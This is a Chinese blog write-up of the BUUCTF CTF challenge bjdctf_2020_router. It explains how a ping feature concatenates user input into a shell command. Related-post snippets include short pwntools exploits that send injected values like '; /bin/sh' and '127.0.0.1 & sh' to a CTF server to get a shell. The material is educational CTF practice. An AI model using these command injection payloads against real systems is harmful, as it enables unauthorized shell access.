BUUCTF-bjdctf_2020_router-WP

最新推荐文章于 2025-11-25 11:29:48 发布
原创 最新推荐文章于 2025-11-25 11:29:48 发布 · 723 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #安全

文章介绍了如何使用checksec工具检查64位程序的安全性,接着通过IDA调试器定位到main()函数,发现了一个功能,该功能允许用户通过ping命令控制buf并拼接到dest后执行。利用这一漏洞,通过nc连接远程服务器并执行ls;catflag命令,成功获取了flag。

1.checksec

64位 

2.IDA

 有一个菜单选择

main()函数

功能1是一个ping命令

buf可控,拼接在dest后,Linux里用;(分号)连接两个命令,同时执行 

nc连接上远程,选择功能1,同时执行命令  ls;cat flag

3.EXP

得到flag 

[BUUCTF-pwn]——bjdctf_2020_router
Y_peak的博客
03-16 429
[BUUCTF-pwn]——bjdctf_2020_router 关键漏洞, 如果输入 ; /bin/sh 就会执行system("/bin/sh") 分号是分割符 exploit from pwn import * p = remote("node3.buuoj.cn",27911) p.sendline('1') p.sendafter("Please input the ip address:\n", "; /bin/sh\x00") p.interactive() ...
BUUCTF pwn——bjdctf_2020_router
CNS-Enterprise BCC-1701-J
05-09 377
BUUCTF 做题练习
BUUCTFbjdctf_2020_router
m0_51251108的博客
12-31 399
BUUCTFbjdctf_2020_router linux里面命令可以用;或&分隔,接下来就可以输我们要的命令了
[BUUCTF]PWN——bjdctf_2020_router
mcmuyanga的博客
11-06 1170
bjdctf_2020_router 附件 步骤: 例行检查,64位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 会让我们选择,选择4.root,没什么用,但是注意了,这边选1会执行ping命令,尝试在ping命令后拼接ls,可以看到ls命令也执行了 这边利用了linux下的命令机制,命令1+;+命令2 这样的格式两种指令都会执行 3 . 利用这点,远程连接,尝试读出flag ...
bjdctf_2020_router
、moddemod
07-06 586
exp from pwn import * p = remote('node3.buuoj.cn', 28110) p.sendlineafter('choose:', b'1') p.sendlineafter('address', b'127.0.0.1 & sh') p.interactive()
openwrt-ramips-mt7621-xiaomi_redmi-router-ac2100-initramfs-kernel.bin
07-31
小米/红米AC2100
PHP - Net_RouterOS:MikroTik RouterOS API协议的客户端,用PHP编写。-开源
04-16
MikroTik RouterOS API协议的客户端,用PHP编写。 简单,经过测试和记录。 欢迎所有反馈。
MikroTik-RouterOS-X86_64-DISK2G-L5-V7.ova
06-10
MikroTik-RouterOS-X86_64-DISK2G-L5-V7
bjdctf_2020_router 1
weixin_74861133的博客
03-10 507
逻辑很简单,一直打印菜单,但仔细看来只有1有用,别的都是迷惑的,1中的功能先是读入一个0x10大小的字符串buf,然后使用strcat函数将buf拼接在dest后面,那这个dest是什么呢,我们先随便输入一个字符串跟据后面的提示想到dest应该是ping,因为ping命令后面什么也不跟会报错。还有一种方法就是上面已经有了dest的值了。
bjdctf-2020-router
m0_73743784的博客
09-01 371
其实知道 Linux 中的命令执行可以用;分隔就会非常简单。
bjdctf_2020_router--buuctf
2301_81060697的博客
04-21 372
分号实现命令一行执行
BJDCTF2020 router
qq_39980610的博客
08-23 358
BJDCTF2020 router
BJDCTF-2020-WRITEUP---TiKi小组
pone2233的博客
03-23 2616
title: BJDCTF 2020 刷题记录 categories: CTF tags: BJDCTF CTF2020 BJDCTF Web duangShell 根据提示,输入.index.php.swp下载到源码。 之后在linux内输入vim -r index.php.swp即可看到源码 <!DOCTYPE html> <html lang="en"> &...
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 434
BUUCTF 做题练习
BUUCTF bjdctf_2020_router
2401_88087539的博客
04-21 224
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
平台政策频变,跨境卖家如何筑牢安全防线?
最新发布
2501_93135886的博客
11-25 299
跨境电商正在进入精细化运营的新阶段,卖家需要在把握平台政策导向的同时,建立完善的风险防御体系,通过合规经营、供应链优化和安全管理,构建可持续的竞争壁垒,在这个快速变化的环境中,只有适应变革、主动求变的卖家,才能赢得长期发展的机会。针对这类风险,卖家需要建立更严谨的证据管理机制,从产品出厂到发货的每个环节都应保留完整的影像资料,形成可追溯的证据链,在处理客户投诉时,要求提供多角度证据或视频资料,能够有效识别AI生成的虚假内容。
人工智能时代:以备案制度筑牢安全防线
qq_58995858的博客
11-24 319
人工智能技术快速发展带来安全隐患,如自动驾驶事故、算法歧视等问题凸显。国家出台备案制度,要求AI产品提交技术资料和数据样本,增强透明度。该制度通过算法可解释性、公平性评估等机制,有效降低技术风险,提升用户信任。备案不仅是合规要求,更是构建数字时代信任基石的关键举措,将推动AI行业健康有序发展。
router-link _blank
09-17
在 Vue.js 中,`<router-link>` 默认不直接支持 `target="_blank"` 属性,但可通过以下方法实现新窗口打开链接: - **渲染为原生 `<a>` 标签**:将 `<router-link>` 渲染为原生的 `<a>` 标签并添加 `target="_blank...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值